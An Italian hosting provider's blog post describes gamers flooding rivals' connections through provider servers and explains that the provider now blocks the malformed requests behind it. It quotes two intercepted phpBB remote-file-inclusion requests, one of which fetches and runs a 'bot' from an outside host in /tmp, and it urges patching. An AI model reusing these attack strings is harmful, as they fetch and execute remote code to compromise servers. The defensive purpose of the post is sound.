Come ti vinco al gioco di ruolo![/size]
Salve a tutti, questa sera vogliamo parlare della nuova moda che sta' imperversando per la rete, e che sta' prendendo piede tra i giovani che giocano in rete e che vogliono vincere a tutti i costi.
Come fare se si e' in svantaggio, in un combattimento e il nostro avversario e' vicino alla vittoria? Semplice, basta saturare l'adsl del nostro concorrente ed il gioco e' fatto! Visto che per ovvi motivi non possiamo saturare l'adsl di un altro, con la nostra adsl in quanto provandoci finiremmo per saturare anche la nostra linea internet, ci facciamo aiutare da un server di un provider qualsiasi, basta dargli in pasto una semplice stringa (URI malformata) e il server del provider consumera' tutta la sua banda a disposizione per saturare l'adsl altrui... e la vittoria sara' sicura!
Con questa tecnica si va a causare problemi al server del provider scelto, che mentre aiuta (suo malgrado) i ragazzini a vincere una battaglia nel loro gioco di ruolo preferito, non riesce a fare il suo lavoro.
Visto che la moda in tal senso sta' conoscendo una grande escalation, forse perche' e' facile reperire informazioni in su come fare e si tratta di una tecnica banale che puo' essere messa in piedi anche da chi ha conoscenze limitate, nei server Tophost abbiamo implementato un controllo che blocca tutti questi tipi di URI malformati.Ecco un esempio di un paio di stringhe malevole intercettate e bloccate, stringhe che miravano a qualcosa di piu' che far vincere a qualcuno il gioco di ruolo:
GET //modules/Forums/admin/admin_styles.php?
phpbb_root__path=http://www.foxcf.hpgvip.ig.com.br/cse.gif?
&cmd=cd20%/tmp;fetch%20http://cartoesdeamor.fromru.com
/bot%20;%20perl%20bot
GET
/php/html//modules/Forums/admin/admin_styles.php?
phpbb_root__path=http://www.phantasmairc.hpgvip.com.br
/CMD.txt?&cmd=id
La seconda di queste due stringhe tenta di far inserire in "/tmp" e poi di far eseguire il contenuto del file "CMD.txt", file che contiente tentativi di scalare i privilegi di root del server, sfruttando vulnerabilita' note.
Abbiamo analizzato tale file e possiamo dire che tutti gli exploit contenuti sono stati correntemente gia patchati e non avrebbero arrecato danno nei server Tophost.
Se contiamo il fatto che tali tentativi di exploit e invio di URI malformati vengono effettuati in automatico da script programmati appositamente, che prima si interfacciano con google per reperire un elenco di siti candidati e poi eseguono alla cieca decine e decine di tentativi provando tutti i tipi di exploit fino a che non trovano il modo di entrare, questo fa capire l'importanza di tenere aggiornati tutti gli script pubblicati dal lato utente e tutti i moduli/software del server dal lato del provider!P.S. Va da se che quanto pubblicato in questo messaggio non vuole essere un'incitamento a delinquere.
Buona serata.